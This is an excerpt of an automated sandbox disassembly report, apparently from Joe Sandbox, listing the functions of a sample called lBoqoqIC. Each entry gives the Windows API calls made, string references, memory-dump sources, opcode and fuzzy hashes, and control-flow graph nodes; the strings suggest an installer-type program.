                                                                                                                • WideCharToMultiByte.KERNEL32(00000220,Eastern Summer Time,000000FF,0000003F,00000000,?,?,004B966F,004BAE64,?,?,?,?,004B2098,00000000,?), ref: 004B979B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$ByteCharMultiWide$EnterInformationInitializeLeaveTimeZone
                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time$T)R
                                                                                                                • API String ID: 3442286286-916455801
                                                                                                                • Opcode ID: 183c54108d68b0f6ec17657df8a831e903b5028ee3689820bf372e9cb9401cc9
                                                                                                                • Instruction ID: 296538d698a59c5eda49d32dad23ace4f3358159aebf9b8f73aaf73d7ae48b13
                                                                                                                • Opcode Fuzzy Hash: 183c54108d68b0f6ec17657df8a831e903b5028ee3689820bf372e9cb9401cc9
                                                                                                                • Instruction Fuzzy Hash: 3F614675515244AAD735AF29EC81BA63FE8BF23314F24002FE544862A1D7384DCBE76D
                                                                                                                Function 10001120 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 459COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10002990: CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000,00000000), ref: 100029D6
                                                                                                                • ShellExecuteA.SHELL32(00000000,1001C228,?,?,00000000,00000000), ref: 10001D34
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseExecuteHandleShell
                                                                                                                • String ID: 6A2V$<sK
                                                                                                                • API String ID: 283469938-3337307597
                                                                                                                • Opcode ID: 3d61d790cbad164f5132db8f129e2413aab9d790ea353cda8f0d62662f8f26e5
                                                                                                                • Instruction ID: 5fb5078009f1e85b9e10a7122cf3cdb11c80ac6edd95854362f6ce01dcf84b75
                                                                                                                • Opcode Fuzzy Hash: 3d61d790cbad164f5132db8f129e2413aab9d790ea353cda8f0d62662f8f26e5
                                                                                                                • Instruction Fuzzy Hash: 93622DB4D05AA88EDB68CF18DD917EEBBB0AF48216F1051DA998DA7351DB305FC18F04
                                                                                                                Function 10001D70 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 433COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 10002990: CloseHandle.KERNEL32(00000000,00000000,?,00000002,00000000,00000000), ref: 100029D6
                                                                                                                • ShellExecuteA.SHELL32(00000000,1001C228,?,?,00000000,00000000), ref: 100028C8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3352388124.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_10001000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseExecuteHandleShell
                                                                                                                • String ID: 6A2V$pq""
                                                                                                                • API String ID: 283469938-3282115823
                                                                                                                • Opcode ID: 0637a93aa524cafee2544bffaf2bf0194bed5cd4d8015f4a2a265cb08865ea77
                                                                                                                • Instruction ID: 189ecf1726460a143d33dff5720d59c1b7fdd8d83f1fcdf86a7c363aab96aeee
                                                                                                                • Opcode Fuzzy Hash: 0637a93aa524cafee2544bffaf2bf0194bed5cd4d8015f4a2a265cb08865ea77
                                                                                                                • Instruction Fuzzy Hash: 63624CB4D06B688EEBA4CF18DD91BAABBB0BF58216F1051D9D54DA7381DB305EC18F04
                                                                                                                Function 004A1C80 Relevance: 4.6, APIs: 3, Instructions: 70fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileA.KERNEL32(?,00000000,00000000,00000000,00008CFC), ref: 004A1C9C
                                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 004A1CAB
                                                                                                                • FindClose.KERNEL32(00000000), ref: 004A1D40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Find$FileFirst$Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 2810966245-0
                                                                                                                • Opcode ID: a5debab4b861ac2e1fa388fac5d1a00f88dfb7804d5fee0552107008bfa178c6
                                                                                                                • Instruction ID: b831aebb5e4ab5b713a90203a29176eb06b2a27de6e3d4cccf8d6629f1b36694
                                                                                                                • Opcode Fuzzy Hash: a5debab4b861ac2e1fa388fac5d1a00f88dfb7804d5fee0552107008bfa178c6
                                                                                                                • Instruction Fuzzy Hash: 2921D7354187409BD320CF75D8405DBB7F8EFA9320F008A1ED59987761E778E50987A6
                                                                                                                Function 004C78B1 Relevance: 3.4, APIs: 2, Instructions: 422COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004C78B6
                                                                                                                • GetVersion.KERNEL32(00000007,?,?,00000000,00000000,?,0000C000,00000000,00000000,00000007), ref: 004C7A69
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prologVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836448879-0
                                                                                                                • Opcode ID: ea7da405db8cf2f1d8844a4bdf09fc8a0207c27f8fc2b3ac2b6c128ce338f1e8
                                                                                                                • Instruction ID: 492234ff71f6d14221b67680b9b2f99d905000c80840d5088ec19b118ca4ac3c
                                                                                                                • Opcode Fuzzy Hash: ea7da405db8cf2f1d8844a4bdf09fc8a0207c27f8fc2b3ac2b6c128ce338f1e8
                                                                                                                • Instruction Fuzzy Hash: 3DE18D78608215ABDF94DF25C880FBE37A9AF04314F10851EF8169A292D739DA02DF69
                                                                                                                Function 004C728C Relevance: 3.0, APIs: 2, Instructions: 27nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtdllDefWindowProc_A.NTDLL(?,?,?,?), ref: 004C72B3
                                                                                                                • CallWindowProcA.USER32(?,?,?,?,?), ref: 004C72C8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallNtdllProcProc_
                                                                                                                • String ID:
                                                                                                                • API String ID: 1646280189-0
                                                                                                                • Opcode ID: 644f702fd7153a7930cd7d49a6192f5c948a8de766148d97a01d092ce553439c
                                                                                                                • Instruction ID: 9c3125ee2feafede6c5e73c9358da760059516fb0998f92e844c74aec95dde2b
                                                                                                                • Opcode Fuzzy Hash: 644f702fd7153a7930cd7d49a6192f5c948a8de766148d97a01d092ce553439c
                                                                                                                • Instruction Fuzzy Hash: 8AF0AC3A104608FFDF519F95DC44E9A7BB9FF18390B148869F94686120D732D821EF54
                                                                                                                Function 004C6A59 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: dea5cd259310289d100226a34edfc2cb2c2d605fae87edd5bb9de06205afe20e
                                                                                                                • Instruction ID: c5f7ade71a23adcfe6d869aff34aaf181c4f871ec88d0156e6aebcfd3f3231ca
                                                                                                                • Opcode Fuzzy Hash: dea5cd259310289d100226a34edfc2cb2c2d605fae87edd5bb9de06205afe20e
                                                                                                                • Instruction Fuzzy Hash: D8F0123A101519BBCF529E919C10FEF3719AF0D3A0F11C41BFA1465051C73AD921DFA9
                                                                                                                Function 00476ED6 Relevance: 135.9, APIs: 4, Strings: 73, Instructions: 1174COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 0 476ed6-4776f7 call 4aef44 call 4c5f18 call 473c2e call 4c6286 call 4c5c1f call 4c5f18 call 473b88 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 478ba6 call 4c5f18 call 473b88 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 478ba6 call 4c5f18 call 473b88 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5fe3 call 4c5eaa call 4c5c1f call 4c5f18 call 478d21 call 4c5c1f call 4c5f18 call 473b88 call 4c5f18 call 477fdd call 4c5fe3 call 4c5eaa call 4c5c1f call 4c5f18 call 478d21 call 4c5f18 call 477fdd call 4c5f18 call 478d21 call 4c5f18 call 478ba6 call 4c5f18 call 473b88 call 4c5f18 call 477fdd call 4c5f18 call 478d21 GetSystemDirectoryA call 4c6033 call 4c2c4d call 4c5c1f call 4c5f18 call 478d21 call 4c5f18 call 478ba6 call 4c5f18 call 473b88 GetWindowsDirectoryA 259 477717-47771f call 4c6033 0->259 260 4776f9-477715 call 4c6033 call 4c2c4d 0->260 264 477724-4777d0 call 4c5c1f call 4c5f18 call 478d21 call 4c5f18 call 478ba6 call 4c5f18 call 473b88 call 4c5f18 call 478ba6 call 4c5fe3 call 4c5eaa 259->264 260->264 289 477803-477817 GetTempPathA 264->289 290 4777d2-4777fe call 4c281a call 4c5f18 call 478d21 264->290 292 477851-477877 call 4c5f18 call 478ba6 289->292 293 477819-47784f call 4c6033 call 4c2c4d call 4c5c1f 289->293 290->289 307 47787a-4779e8 call 4c5f18 call 478d21 call 4c5f18 call 478ba6 call 4c5f18 call 473b88 call 4c5fe3 call 4c2c4d call 4c5c1f call 4c5f18 call 478d21 call 4c5f18 call 478ba6 call 4c5f18 call 473b88 call 4123ac call 403af0 call 4c5f18 * 2 call 478d21 call 4c5f18 * 2 call 478d21 292->307 293->307 355 477af7-477b37 call 40412e call 403d43 call 403d6d call 403d97 call 403e6d 307->355 356 4779ee-477a2e call 40412e call 403d43 call 403d6d call 403d97 call 403e6d 307->356 379 477b85-477bc8 call 40412e call 403d43 call 403d6d call 403d97 call 403e6d 355->379 380 477b39-477b5c call 4c5f18 call 40414b 355->380 377 477a77-477aba call 40412e call 403d43 call 403d6d call 403d97 call 403e6d 356->377 378 477a30-477a72 call 4c5f18 call 40414b call 4c5f18 call 478d21 356->378 416 477c11-477c1b call 477cb2 377->416 417 477ac0-477af2 call 4c5f18 call 40414b 377->417 378->377 379->416 418 477bca-477bed call 4c5f18 call 40414b 379->418 395 477b61-477b80 call 4c5f18 call 478d21 380->395 395->379 422 477c20-477cb1 call 4c5f18 call 478d21 call 4c5f18 * 2 call 473b88 call 404bfb call 412526 call 4c5eaa * 2 416->422 432 477bfc-477c0c call 4c5f18 call 478d21 417->432 430 477bf2-477bf9 418->430 430->432 432->416
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00476EDB
                                                                                                                  • Part of subcall function 00473C2E: __EH_prolog.LIBCMT ref: 00473C33
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 00473B88: __EH_prolog.LIBCMT ref: 00473B8D
                                                                                                                  • Part of subcall function 00477FDD: __EH_prolog.LIBCMT ref: 00477FE2
                                                                                                                  • Part of subcall function 00478D21: __EH_prolog.LIBCMT ref: 00478D26
                                                                                                                  • Part of subcall function 00478BA6: __EH_prolog.LIBCMT ref: 00478BAB
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                  • Part of subcall function 004C5FE3: InterlockedIncrement.KERNEL32(-000000F4), ref: 004C6026
                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0047764C
                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104,?,%SystemFolder%,?,?,%SystemFolder%,?,?,?,00000000,00510870,?,?,?,SHF_COMMONFILES), ref: 004776EF
                                                                                                                • GetTempPathA.KERNEL32(00000104,?,00000000,?,%WindowsFolder%,?,?,%WindowsFolder%,?,?,%WindowsFolder%,?,?,?,00000000,00523A30), ref: 0047780F
                                                                                                                  • Part of subcall function 004C6033: lstrlen.KERNEL32(?,?,00000000,004C5E52,005247C8,00403DCA,00000000,00403C1B,00000000,00000000,004019FC,?), ref: 004C6044
                                                                                                                  • Part of subcall function 004123AC: __EH_prolog.LIBCMT ref: 004123B1
                                                                                                                  • Part of subcall function 004123AC: GetVersionExA.KERNEL32(?,Unknown OS), ref: 0041241A
                                                                                                                  • Part of subcall function 00403AF0: __EH_prolog.LIBCMT ref: 00403AF5
                                                                                                                  • Part of subcall function 00403E6D: __EH_prolog.LIBCMT ref: 00403E72
                                                                                                                  • Part of subcall function 0040414B: __EH_prolog.LIBCMT ref: 00404150
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$Interlocked$DirectoryIncrementlstrlen$DecrementPathSystemTempVersionWindows
                                                                                                                • String ID: %ApplicationDataFolder%$%ApplicationDataFolderCommon%$%CommonDocumentsFolder%$%CommonFilesFolder%$%CommonFilesFolder64%$%DAOPath%$%DesktopFolder%$%DesktopFolderCommon%$%FontsFolder%$%MyDocumentsFolder%$%MyMusicFolder%$%MyMusicFolderCommon%$%MyPicturesFolder%$%MyPicturesFolderCommon%$%MyVideosFolder%$%MyVideosFolderCommon%$%ProgramFilesFolder%$%ProgramFilesFolder64%$%RegOrganization%$%RegOwner%$%SourceFolder%$%StartFolder%$%StartFolderCommon%$%StartProgramsFolder%$%StartProgramsFolderCommon%$%StartupFolder%$%StartupFolderCommon%$%SystemDrive%$%SystemFolder%$%TempFolder%$%TempLaunchFolder%$%WindowsFolder%$+$0:R$0:R$;?;?.lua$LUA_PATH$LocalMachine$RegisteredOrganization$RegisteredOwner$SHF_APPLICATIONDATA$SHF_APPLICATIONDATA_COMMON$SHF_COMMONFILES$SHF_COMMON_DOCUMENTS$SHF_DESKTOP$SHF_DESKTOP_COMMON$SHF_FONTS$SHF_MYDOCUMENTS$SHF_MYMUSIC$SHF_MYMUSIC_COMMON$SHF_MYPICTURES$SHF_MYPICTURES_COMMON$SHF_MYVIDEOS$SHF_MYVIDEOS_COMMON$SHF_PROGRAMFILES$SHF_STARTMENU$SHF_STARTMENUPROGRAMS$SHF_STARTMENUPROGRAMS_COMMON$SHF_STARTMENU_COMMON$SHF_STARTUP$SHF_STARTUP_COMMON$Software\Microsoft\Windows NT\CurrentVersion$Software\Microsoft\Windows\CurrentVersion$TU30$_DesktopFolder$_DesktopFolderCommon$_IR_ProductID$_ProgramFilesFolder$_ProgramFilesFolder64$_SystemFolder$_TempFolder$_TempLaunchFolder$_WindowsFolder
                                                                                                                • API String ID: 1477991253-3824247321
                                                                                                                • Opcode ID: e675ca4b12d57b052ae2d7de3d483a93a45b379d866ae05caa4f00b464a4923c
                                                                                                                • Instruction ID: 40282f7f56d9f4a58be1ee9f93a274aea3250a13a5a1aecc613490b641460fb7
                                                                                                                • Opcode Fuzzy Hash: e675ca4b12d57b052ae2d7de3d483a93a45b379d866ae05caa4f00b464a4923c
                                                                                                                • Instruction Fuzzy Hash: 93924674A1424DABDF08EB99C957EEEBEB99F59744F10414EF00573282CAB81B4087F6
                                                                                                                Function 0049BF20 Relevance: 84.7, APIs: 46, Strings: 2, Instructions: 678stringCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 690 49bf20-49bf3e TlsGetValue 691 49bf50-49bf63 690->691 692 49bf40-49bf4f 690->692 693 49bf69-49bf72 lstrlen 691->693 694 49c7c4-49c7ca 691->694 693->694 696 49bf78-49bf7a 693->696 695 49c7cc-49c7ee call 4a1f10 call 49a580 694->695 698 49bf89-49bf8e 696->698 699 49bf7c-49bf84 696->699 701 49bf9b-49bfa0 698->701 702 49bf90-49bf95 698->702 699->695 704 49bfaf-49bfc9 call 4a1b40 lstrlen 701->704 705 49bfa2-49bfaa 701->705 702->701 706 49c01f-49c03a lstrlen LocalAlloc 702->706 715 49bfd8-49bfe0 704->715 716 49bfcb-49bfd3 704->716 705->695 708 49c03c-49c066 call 4a1f10 call 49a580 706->708 709 49c067-49c072 LocalLock 706->709 711 49c074-49c0a5 LocalFree call 4a1f10 call 49a580 709->711 712 49c0a6-49c0c0 GlobalAlloc 709->712 718 49c1b5-49c1c4 712->718 719 49c0c6-49c0d3 GlobalLock 712->719 721 49bff8-49c011 lstrcpy call 4a2110 715->721 722 49bfe2-49bfe5 715->722 716->695 724 49c0ec-49c124 lstrcpy CharUpperA 719->724 725 49c0d5-49c0eb GlobalFree 719->725 721->706 738 49c013-49c019 lstrcat 721->738 727 49bfeb-49bff3 722->727 728 49bfe7-49bfe9 722->728 731 49c12a 724->731 732 49c1f6 724->732 727->695 728->721 728->727 736 49c12f-49c137 731->736 737 49c1fe-49c216 call 49bc90 732->737 739 49c139-49c13b 736->739 740 49c15f-49c161 736->740 748 49c789-49c7c3 LocalUnlock LocalFree GlobalUnlock GlobalFree 737->748 749 49c21c-49c229 737->749 738->706 744 49c13d-49c145 739->744 745 49c147 739->745 742 49c14f-49c156 CharNextA 740->742 743 49c163-49c165 740->743 747 49c158-49c15b 742->747 743->742 750 49c167-49c17d 743->750 744->743 745->742 747->736 751 49c15d-49c1cb 747->751 752 49c22b 749->752 753 49c242-49c24b 749->753 750->747 754 49c17f-49c197 GlobalReAlloc 750->754 751->732 768 49c1cd-49c1f1 GlobalUnlock GlobalFree 751->768 756 49c231-49c234 752->756 757 49c24d-49c257 753->757 758 49c25f-49c264 753->758 754->718 759 49c199-49c1aa GlobalLock 754->759 760 49c239-49c240 CharNextA 756->760 761 49c236 756->761 762 49c779-49c77f 757->762 763 49c25d 757->763 766 49c270-49c2b0 call 49b210 lstrcpy CharUpperA * 2 758->766 767 49c266-49c26d call 4a0600 758->767 764 49c1ac 759->764 765 49c1ae-49c1af GlobalFree 759->765 760->753 760->756 761->760 762->737 769 49c785 762->769 763->766 764->747 765->718 774 49c2c8-49c2cf 766->774 775 49c2b2-49c2c2 lstrlen 766->775 767->766 768->695 769->748 774->762 776 49c2d5-49c2e1 774->776 775->762 775->774 777 49c2e3-49c2e8 776->777 778 49c2f6-49c310 lstrcpy 776->778 777->778 779 49c2ea-49c2f1 777->779 780 49c31d-49c32c 778->780 781 49c312-49c31b 778->781 782 49c3ff-49c40d 779->782 783 49c32d-49c356 lstrcat CreateFileA 780->783 781->783 782->762 784 49c413-49c425 782->784 785 49c358-49c35d 783->785 786 49c377-49c3fd CloseHandle call 4a04a0 wsprintfA call 4a0300 783->786 787 49c42d-49c430 784->787 788 49c36b-49c372 785->788 789 49c35f-49c366 785->789 786->782 791 49c775 787->791 792 49c436-49c484 call 4a1b40 call 49b210 CharUpperA call 4a2040 787->792 788->782 789->782 791->762 802 49c4e7-49c4fb call 4a2040 792->802 803 49c486-49c492 lstrlen 792->803 815 49c501-49c50d lstrlen 802->815 816 49c673-49c687 call 4a2040 802->816 805 49c4b4-49c4c0 803->805 806 49c494-49c4a9 lstrcmp 803->806 810 49c4d9-49c4e2 805->810 811 49c4c2-49c4d3 call 4a2040 805->811 808 49c4af 806->808 809 49c755-49c76f 806->809 817 49c750 808->817 809->791 812 49c427 809->812 814 49c64d-49c655 810->814 811->809 811->810 812->787 819 49c656-49c660 call 49b2a0 814->819 815->816 820 49c513-49c54b lstrcpy call 4a20d0 call 4a2110 815->820 816->809 827 49c68d-49c699 lstrlen 816->827 817->809 819->809 828 49c666-49c668 819->828 835 49c54d-49c565 call 4a2040 820->835 836 49c5c0-49c5d8 call 4a2040 820->836 827->809 829 49c69f-49c6ae call 4a2110 827->829 828->809 831 49c66e 828->831 839 49c6fd-49c715 call 4a2040 829->839 840 49c6b0-49c6c8 call 4a2040 829->840 831->817 835->809 847 49c56b-49c588 lstrlen * 2 835->847 836->809 846 49c5de-49c5ea 836->846 839->809 850 49c717-49c723 839->850 840->809 853 49c6ce-49c6eb lstrlen * 2 840->853 851 49c5ec-49c5fe 846->851 852 49c600-49c618 call 4a2040 846->852 847->817 849 49c58e-49c59a 847->849 849->809 854 49c5a0-49c5b5 lstrcmp 849->854 856 49c72b-49c74a call 4a2040 call 4a20d0 850->856 857 49c725-49c727 850->857 851->819 852->809 864 49c61e-49c63e lstrlen call 4a20d0 852->864 853->817 855 49c6ed-49c6f9 853->855 854->809 860 49c5bb 854->860 855->809 859 49c6fb 855->859 856->809 870 49c74c-49c74e 856->870 857->809 861 49c729 857->861 859->817 860->817 861->817 864->809 871 49c644-49c646 864->871 870->809 870->817 871->814
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,?,?,?,00000000), ref: 0049BF30
                                                                                                                • lstrlen.KERNEL32(?,?,00000000), ref: 0049BF6A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Valuelstrlen
                                                                                                                • String ID: %02ld$*.*
                                                                                                                • API String ID: 799288031-1307316557
                                                                                                                • Opcode ID: 8ed11d18685dcf33048ac6650db020507c19ef213b46d08b148489560b746fec
